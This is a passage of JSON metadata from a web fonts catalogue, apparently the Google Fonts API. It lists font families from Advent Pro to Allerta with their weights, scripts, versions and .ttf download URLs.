\"900\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpL6iRPTJoonw1aBA.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2CnDpAsvQhKBH4C.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2AnD5AsvQhKBH4C.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2D5D5AsvQhKBH4C.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2CnD5AsvQhKBH4C.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2CVD5AsvQhKBH4C.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2B5CJAsvQhKBH4C.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2BACJAsvQhKBH4C.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2AnCJAsvQhKBH4C.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mkoQfxVT4Dvddr_yOwhT-3Jr6w5kKOEbAVEvZiKGAr6BX29i1ei2AOCJAsvQhKBH4C.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aguafina Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/aguafinascript/v16/If2QXTv_ZzSxGIO30LemWEOmt1bHqs4pgicOrg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Akaya Kanadaka\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/akayakanadaka/v16/N0bM2S5CPO5oOQqvazoRRb-8-PfRS5VBBSSF.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Akaya Telivigala\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"telugu\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/akayatelivigala/v22/lJwc-oo_iG9wXqU3rCTD395tp0uifdLdsIH0YH8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Akronim\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/akronim/v23/fdN-9sqWtWZZlHRp-gBxkFYN-a8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Akshar\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSSgFy9CY94XsnPc.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSXYFy9CY94XsnPc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSUQFy9CY94XsnPc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSagCy9CY94XsnPc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/akshar/v5/Yq6I-LyHWTfz9rGoqDaUbHvhkAUsSZECy9CY94XsnPc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aladin\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/aladin/v18/ZgNSjPJFPrvJV5f16Sf4pGT2Ng.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alata\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alata/v9/PbytFmztEwbIofe6xKcRQEOX.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alatsi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alatsi/v10/TK3iWkUJAxQ2nLNGHjUHte5fKg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Albert Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHq5L_rI32TxAj1g.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHK5P_rI32TxAj1g.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSH9ZP_rI32TxAj1g.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHq5P_rI32TxAj1g.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHmZP_rI32TxAj1g.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHdZT_rI32TxAj1g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHTJT_rI32TxAj1g.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHK5T_rI32TxAj1g.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dZIFdwYjGaAMFtZd_QA3xXSKZqhr-TenSHApT_rI32TxAj1g.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9AX7ofybRUz1r5t.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9CX74fybRUz1r5t.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9BJ74fybRUz1r5t.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9AX74fybRUz1r5t.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9Al74fybRUz1r5t.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9DJ6IfybRUz1r5t.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9Dw6IfybRUz1r5t.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9CX6IfybRUz1r5t.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/albertsans/v1/i7dfIFdwYjGaAMFtZd_QA1Zeelmy79QJ1HOSY9C-6IfybRUz1r5t.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aldrich\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/aldrich/v17/MCoTzAn-1s3IGyJMZaAS3pP5H_E.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alef\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alef/v21/FeVfS0NQpLYgrjJbC5FxxbU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/alef/v21/FeVQS0NQpLYglo50L5la2bxii28.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alegreya\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v31\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alegreya/v31/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNG9hUI_KCisSGVrw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/alegreya/v31/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGxBUI_KCisSGVrw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/alegreya/v31/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGKBII_KCisSGVrw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/alegreya/v31/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGERII_KCisSGVrw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/alegreya/v31/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGdhII_KCisSGVrw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/alegreya/v31/4UacrEBBsBhlBjvfkQjt71kZfyBzPgNGXxII_KCisSGVrw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alegreya/v31/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlbgv6qmkySFr9V9.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/alegreya/v31/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlbSv6qmkySFr9V9.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/alegreya/v31/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlY-uKqmkySFr9V9.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/alegreya/v31/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlYHuKqmkySFr9V9.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/alegreya/v31/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlZguKqmkySFr9V9.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/alegreya/v31/4UaSrEBBsBhlBjvfkSLk3abBFkvpkARTPlZJuKqmkySFr9V9.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alegreya SC\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiOGmRtCJ62-O0HhNEa-a6o05E5abe_.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiMGmRtCJ62-O0HhNEa-Z6q2ZUbbKe_DGs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiTGmRtCJ62-O0HhNEa-ZZc-rUxQqu2FXKD.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiRGmRtCJ62-O0HhNEa-Z6q4WEySK-UEGKDBz4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiTGmRtCJ62-O0HhNEa-ZYU_LUxQqu2FXKD.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiRGmRtCJ62-O0HhNEa-Z6q4Sk0SK-UEGKDBz4.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiTGmRtCJ62-O0HhNEa-ZYI_7UxQqu2FXKD.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiRGmRtCJ62-O0HhNEa-Z6q4TU3SK-UEGKDBz4.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiTGmRtCJ62-O0HhNEa-ZYs_rUxQqu2FXKD.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/alegreyasc/v25/taiRGmRtCJ62-O0HhNEa-Z6q4RE2SK-UEGKDBz4.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alegreya Sans\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUt9_-1phKLFgshYDvh6Vwt5TltuGdShm5bsg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUv9_-1phKLFgshYDvh6Vwt7V9V3G1WpGtLsgu7.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUu9_-1phKLFgshYDvh6Vwt5fFPmE18imdCqxI.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUo9_-1phKLFgshYDvh6Vwt7V9VFE92jkVHuxKiBA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUz9_-1phKLFgshYDvh6Vwt3V1nvEVXlm4.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUt9_-1phKLFgshYDvh6Vwt7V9tuGdShm5bsg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUu9_-1phKLFgshYDvh6Vwt5alOmE18imdCqxI.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUo9_-1phKLFgshYDvh6Vwt7V9VTE52jkVHuxKiBA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUu9_-1phKLFgshYDvh6Vwt5eFImE18imdCqxI.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUo9_-1phKLFgshYDvh6Vwt7V9VBEh2jkVHuxKiBA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUu9_-1phKLFgshYDvh6Vwt5f1LmE18imdCqxI.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUo9_-1phKLFgshYDvh6Vwt7V9VGEt2jkVHuxKiBA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUu9_-1phKLFgshYDvh6Vwt5dlKmE18imdCqxI.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/alegreyasans/v24/5aUo9_-1phKLFgshYDvh6Vwt7V9VPEp2jkVHuxKiBA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alegreya Sans SC\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGn4-RGJqfMvt7P8FUr0Q1j-Hf1Dipl8g5FPYtmMg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGl4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdlgRBH452Mvds.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DuJH0iRrMYJ_K-4.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdXiZhNaB6O-51OA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGh4-RGJqfMvt7P8FUr0Q1j-Hf1Nk5v9ixALYs.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGn4-RGJqfMvt7P8FUr0Q1j-Hf1Bkxl8g5FPYtmMg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DrpG0iRrMYJ_K-4.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdBidhNaB6O-51OA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DvJA0iRrMYJ_K-4.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdTiFhNaB6O-51OA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1Du5D0iRrMYJ_K-4.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxdUiJhNaB6O-51OA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGm4-RGJqfMvt7P8FUr0Q1j-Hf1DspC0iRrMYJ_K-4.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/alegreyasanssc/v23/mtGk4-RGJqfMvt7P8FUr0Q1j-Hf1BkxddiNhNaB6O-51OA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aleo\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/aleo/v11/c4mg1nF8G8_syKbr9DVDno985KM.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/aleo/v11/c4mi1nF8G8_swAjxeDdJmq159KOnWA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/aleo/v11/c4mv1nF8G8_s8ArD0D1ogoY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/aleo/v11/c4mh1nF8G8_swAjJ1B9tkoZl_Q.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/aleo/v11/c4mg1nF8G8_syLbs9DVDno985KM.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/aleo/v11/c4mi1nF8G8_swAjxaDBJmq159KOnWA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alex Brush\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2023-01-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alexbrush/v21/SZc83FzrJKuqFbwMKk6EtUL57DtOmCc.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alexandria\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9r7T6bHHJ8BRq0b.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9p7TqbHHJ8BRq0b.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9qlTqbHHJ8BRq0b.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9r7TqbHHJ8BRq0b.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9rJTqbHHJ8BRq0b.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9olSabHHJ8BRq0b.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9ocSabHHJ8BRq0b.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9p7SabHHJ8BRq0b.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/alexandria/v1/UMBCrPdDqW66y0Y2usFeQCH18mulUxBvI9pSSabHHJ8BRq0b.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alfa Slab One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alfaslabone/v17/6NUQ8FmMKwSEKjnm5-4v-4Jh6dVretWvYmE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alice\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alice/v20/OpNCnoEEmtHa6FcJpA_chzJ0.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alike\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alike/v20/HI_EiYEYI6BIoEjBSZXAQ4-d.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alike Angular\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alikeangular/v20/3qTrojWunjGQtEBlIcwMbSoI3kM6bB7FKjE.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alkalami\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alkalami/v3/zOL_4pfDmqRL95WXi5eLw8BMuvhH.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Allan\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/allan/v20/ea8XadU7WuTxEtb2P9SF8nZE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/allan/v20/ea8aadU7WuTxEu5KEPCN2WpNgEKU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Allerta\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": 